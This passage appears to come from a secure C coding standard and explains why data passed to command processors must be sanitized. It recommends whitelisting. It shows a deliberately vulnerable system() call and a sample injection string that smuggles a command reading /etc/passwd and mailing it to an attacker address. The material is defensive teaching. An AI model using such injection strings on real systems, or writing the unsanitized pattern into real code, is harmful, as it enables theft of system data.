...
- a command processor, via a call to system() or a similar function
- relational databases
- third-party COTS components (e.g., an enterprise resource planning subsystem)
Data sanitization requires an understanding of the data being passed and the capabilities of the subsystem. John Viega and Matt Messier provide an example of an application that reads an email address into a buffer and then uses this string as an argument in a call to system() [Viega 03]:
```c
/* Vulnerable: addr is interpolated unchecked into a command line that the shell will parse */
sprintf(buffer, "/bin/mail %s < /tmp/email", addr);
system(buffer);
```
The risk is, of course, that the user enters the following string as an email address:
```
bogus@addr.com; cat /etc/passwd | mail some@badguy.net
```
It is necessary to ensure that all valid data is accepted while potentially dangerous data is rejected or sanitized. This can be difficult when valid characters or sequences of characters also have special meaning to the subsystem. In cases where there is no overlap, white listing can be used to eliminate dangerous characters from the data.
The white listing approach to data sanitization is to define a list of acceptable characters and remove any character that is not acceptable. The list of valid input values is typically a predictable, well-defined set of manageable size. The following example, based on the tcp_wrappers package written by Wietse Venema, illustrates the white listing approach:
...
The benefit of white listing is that a programmer can be certain that a string contains only characters that are considered safe by the programmer. White listing is recommended over black listing because, instead of having to trap all unacceptable characters, the programmer only needs to ensure that acceptable characters are identified. As a result, the programmer can be less concerned about which characters an attacker may try in an attempt to bypass security checks.
Priority: P18 Level: L1
Failure to sanitize data passed to a complex subsystem can lead to an injection attack, data integrity issues, and a loss of sensitive data.
Component | Value
---|---
Severity | 2 (medium)
Likelihood | 3 (likely)
Remediation cost | 3 (low)
References
- [Viega 03] Viega, John, and Matt Messier. Secure Programming Cookbook for C and C++: Recipes for Cryptography, Authentication, Networking, Input Validation & More. Sebastopol, CA: O'Reilly, 2003. ISBN 0-596-00394-3.
- [ISO/IEC 9899-1999] Section 7.20.4.6, "The system function".